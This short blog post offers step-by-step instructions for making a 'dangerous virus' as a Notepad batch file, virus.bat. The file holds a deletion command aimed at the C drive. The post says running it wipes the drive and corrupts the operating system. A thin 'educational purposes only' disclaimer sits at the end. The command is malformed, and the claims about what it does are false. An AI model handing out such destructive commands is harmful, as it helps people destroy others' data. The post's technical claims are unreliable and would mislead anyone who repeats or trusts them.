Thursday, March 24, 2022

How To Create Computer Virus in Less Than 60 Seconds


Many of you will think the methods must be on coding, but nothing like that. The tricks are based on Notepad.

Creating a Dangerous Virus


Step 1: First of all, in your Windows OS, open Notepad.


Step 2: Now, copy and paste the below code into your notepad screen.


@Echo off

Del C: *.* |y


Step 3: Now save this file as virus.bat (you can select any random name, but .bat after that must be there).


Step 4: Now running the file will delete the C drive completely, and the operating system of the respective computer will get corrupted.


‼️Note: This method is only for educational purposes. Don’t try this on your computer, as it will erase your C drive.

No comments:

Post a Comment